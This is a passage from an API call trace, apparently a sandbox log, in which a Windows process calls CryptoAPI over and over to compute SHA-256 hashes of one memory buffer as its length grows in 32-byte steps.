	[0191.264] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.264] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0191.264] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.264] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264860
	[0191.264] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264860, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264860, pdwDataLen=0x1283b0) returned 1
	[0191.265] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.265] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.265] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.265] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.265] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0191.265] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.265] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264888
	[0191.265] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264888, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264888, pdwDataLen=0x1283b0) returned 1
	[0191.265] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.265] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.265] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.266] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.266] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0191.266] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.266] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2648b0
	[0191.266] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2648b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2648b0, pdwDataLen=0x1283b0) returned 1
	[0191.266] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.266] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.266] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.267] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.267] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0191.267] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.267] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2648d8
	[0191.267] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2648d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2648d8, pdwDataLen=0x1283b0) returned 1
	[0191.267] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.267] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.267] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.268] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.268] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0191.268] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.268] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264900
	[0191.268] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264900, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264900, pdwDataLen=0x1283b0) returned 1
	[0191.268] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.268] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.268] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.268] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.268] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0191.269] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264928
	[0191.269] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264928, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264928, pdwDataLen=0x1283b0) returned 1
	[0191.269] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.269] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.269] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.269] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.269] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0191.269] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.269] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264950
	[0191.269] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264950, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264950, pdwDataLen=0x1283b0) returned 1
	[0191.270] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.270] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.270] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.270] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.270] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0191.270] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.270] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264978
	[0191.270] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264978, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264978, pdwDataLen=0x1283b0) returned 1
	[0191.270] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.270] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.270] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.271] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.271] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0191.271] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.271] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2649a0
	[0191.271] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2649a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2649a0, pdwDataLen=0x1283b0) returned 1
	[0191.271] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.271] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.271] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.272] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.272] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0191.272] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2649c8
	[0191.272] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2649c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2649c8, pdwDataLen=0x1283b0) returned 1
	[0191.272] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.272] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.272] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.276] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.276] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0191.277] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2649f0
	[0191.277] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2649f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2649f0, pdwDataLen=0x1283b0) returned 1
	[0191.277] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.277] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.277] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.277] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.277] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0191.277] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.277] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264a18
	[0191.277] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264a18, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264a18, pdwDataLen=0x1283b0) returned 1
	[0191.278] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.278] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.278] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.278] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.278] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0191.278] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.278] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264a40
	[0191.278] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264a40, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264a40, pdwDataLen=0x1283b0) returned 1
	[0191.278] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.278] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.278] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.279] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.279] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0191.279] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.279] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264a68
	[0191.279] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264a68, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264a68, pdwDataLen=0x1283b0) returned 1
	[0191.279] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.279] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.279] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.280] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.280] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0191.280] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.280] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264a90
	[0191.280] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264a90, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264a90, pdwDataLen=0x1283b0) returned 1
	[0191.281] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.281] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.281] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.281] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.281] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0191.281] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.281] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264ab8
	[0191.281] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264ab8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264ab8, pdwDataLen=0x1283b0) returned 1
	[0191.281] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.281] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.281] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.282] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.282] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0191.282] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264ae0
	[0191.282] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264ae0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264ae0, pdwDataLen=0x1283b0) returned 1
	[0191.282] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.282] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.282] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.282] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.282] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0191.282] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264b08
	[0191.282] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264b08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264b08, pdwDataLen=0x1283b0) returned 1
	[0191.282] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.282] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.282] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.283] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.283] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0191.283] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264b30
	[0191.283] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264b30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264b30, pdwDataLen=0x1283b0) returned 1
	[0191.283] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.283] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.283] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.283] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.283] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0191.283] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264b58
	[0191.283] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264b58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264b58, pdwDataLen=0x1283b0) returned 1
	[0191.283] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.283] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.283] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.284] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.284] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0191.284] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264b80
	[0191.284] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264b80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264b80, pdwDataLen=0x1283b0) returned 1
	[0191.284] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.284] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.284] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.284] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.284] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0191.284] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264ba8
	[0191.284] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264ba8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264ba8, pdwDataLen=0x1283b0) returned 1
	[0191.284] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.284] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.284] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.285] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.285] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0191.285] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264bd0
	[0191.285] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264bd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264bd0, pdwDataLen=0x1283b0) returned 1
	[0191.285] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.285] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.285] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.285] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.285] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0191.285] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264bf8
	[0191.285] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264bf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264bf8, pdwDataLen=0x1283b0) returned 1
	[0191.285] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.285] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.285] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.286] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.286] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0191.286] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264c20
	[0191.286] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264c20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264c20, pdwDataLen=0x1283b0) returned 1
	[0191.286] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.286] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.286] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.286] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.286] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0191.286] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
